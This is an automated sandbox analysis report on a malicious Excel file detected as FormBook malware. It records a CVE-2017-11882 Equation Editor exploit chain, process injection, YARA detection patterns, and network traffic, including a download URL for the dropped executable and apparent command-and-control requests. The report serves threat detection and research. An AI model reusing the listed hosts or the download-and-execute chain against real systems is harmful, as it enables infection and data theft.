
Analysis Report Booking Confirmation.xlsx

Overview

General Information

Sample Name: Booking Confirmation.xlsx
Analysis ID: 323046
MD5: 97ee696e60901ec520c93f0e8b29b956
SHA1: 89780a503e1b57b7d224feb43c5db4db60ede9ff
SHA256: 2f2cf9a7f17157fbf03d37450588c9a1396535874097c29d7b12e512295f85ec
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2448 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2536 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2884 cmdline: 'C:\Users\Public\vbc.exe' MD5: 5DEDC928F9F5E3A4C59490E79BCF0773)
      • RegSvcs.exe (PID: 2344 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • raserver.exe (PID: 3024 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
            • cmd.exe (PID: 3004 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.RegSvcs.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.RegSvcs.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.RegSvcs.exe.400000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x175f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1770c:$sqlite3step: 68 34 1C 7B E1
  • 0x17628:$sqlite3text: 68 38 2A 90 C5
  • 0x1774d:$sqlite3text: 68 38 2A 90 C5
  • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
5.2.RegSvcs.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.RegSvcs.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2884
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 103.125.191.5, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2536, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2536, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
Sigma detected: Executables Started in Suspicious Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2884
Sigma detected: Execution in Non-Executable Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2884
Sigma detected: Suspicious Program Location Process Starts
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2884

            Signature Overview

            AV Detection:

Antivirus detection for URL or domain
Source: http://workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu/worksdoc/svchost.exe | Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe | ReversingLabs: Detection: 25%
Source: C:\Users\Public\vbc.exe | ReversingLabs: Detection: 25%
Multi AV Scanner detection for submitted file
Source: Booking Confirmation.xlsx | Virustotal: Detection: 31%
Source: Booking Confirmation.xlsx | ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: 5.2.RegSvcs.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

            Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop esi
Source: global traffic | DNS query: name: workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80

            Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.125.191.5:80
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.22:49167
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Thu, 26 Nov 2020 08:03:38 GMT | Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38 | Last-Modified: Wed, 25 Nov 2020 23:15:49 GMT | ETag: "de000-5b4f69ba08c46" | Accept-Ranges: bytes | Content-Length: 909312 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload | Data Raw: (omitted)
Source: global traffic | HTTP traffic detected: GET /kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg== HTTP/1.1 | Host: www.affinitymotorsales.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kgw/?YPxdA=qxnbG0TgnGHGw+QslghqCPaDw7mfFbPu6Z/l2x9tLypy5Il4TL/Oe56TI1g3tXVevJbT7w==&FN=-ZD4lhJxcp08lll HTTP/1.1 | Host: www.setyourhead.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 103.125.191.5
Source: Joe Sandbox View | IP Address: 34.102.136.180
Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View | ASN Name: WEBAIR-INTERNETUS
Source: global traffic | HTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu | Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1631DAC0.emf
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
Source: explorer.exe, 00000006.00000000.2209306525.000000000A330000.00000008.00000001.sdmp | String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2209306525.000000000A330000.00000008.00000001.sdmp | String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2198231538.0000000004B50000.00000002.00000001.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000006.00000000.2197607706.0000000003E27000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.2197607706.0000000003E27000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
